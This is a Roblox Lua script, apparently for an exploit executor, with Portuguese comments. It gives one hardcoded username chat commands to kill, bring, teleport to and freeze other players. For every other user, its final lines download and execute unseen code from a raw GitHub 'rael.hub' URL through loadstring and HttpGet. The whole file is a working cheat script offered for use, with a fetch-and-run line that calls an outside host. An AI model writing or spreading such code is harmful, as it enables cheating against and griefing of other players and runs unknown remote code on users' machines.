local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local admins = {["antimandrak"] = true}

local function isAdmin(player)
    return admins[player.Name]
end

-- Comandos disponíveis
local commands = {
    ["/kill"] = function(target)
        if target.Character and target.Character:FindFirstChild("Humanoid") then
            target.Character.Humanoid.Health = 0
        end
    end,
    ["/bring"] = function(target)
        if target.Character and LocalPlayer.Character and target.Character:FindFirstChild("HumanoidRootPart") then
            target.Character:MoveTo(LocalPlayer.Character:GetPrimaryPartCFrame().Position + Vector3.new(2, 0, 0))
        end
    end,
    ["/goto"] = function(target)
        if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
            LocalPlayer.Character:MoveTo(target.Character:GetPrimaryPartCFrame().Position)
        end
    end,
    ["/freeze"] = function(target)
        for _, part in pairs(target.Character:GetChildren()) do
            if part:IsA("BasePart") then
                part.Anchored = true
            end
        end
    end,
    ["/unfreeze"] = function(target)
        for _, part in pairs(target.Character:GetChildren()) do
            if part:IsA("BasePart") then
                part.Anchored = false
            end
        end
    end
}

-- Escutar mensagens do dono
LocalPlayer.Chatted:Connect(function(message)
    if not isAdmin(LocalPlayer) then return end

    local args = message:split(" ")
    local command = args[1]:lower()
    local targetName = args[2]

    local target
    for _, plr in ipairs(Players:GetPlayers()) do
        if plr.Name:lower():sub(1, #targetName) == targetName:lower() then
            target = plr
            break
        end
    end

    if target and commands[command] and not isAdmin(target) then
        commands[command](target)
        print("Comando executado:", command, "em", target.Name)
    end
end)

-- Se não for admin, carrega apenas o outro Hub
if not isAdmin(LocalPlayer) then
    loadstring(game:HttpGet("https://raw.githubusercontent.com/KIRITOZINKS/main.lua/main/rael.hub"))()
end
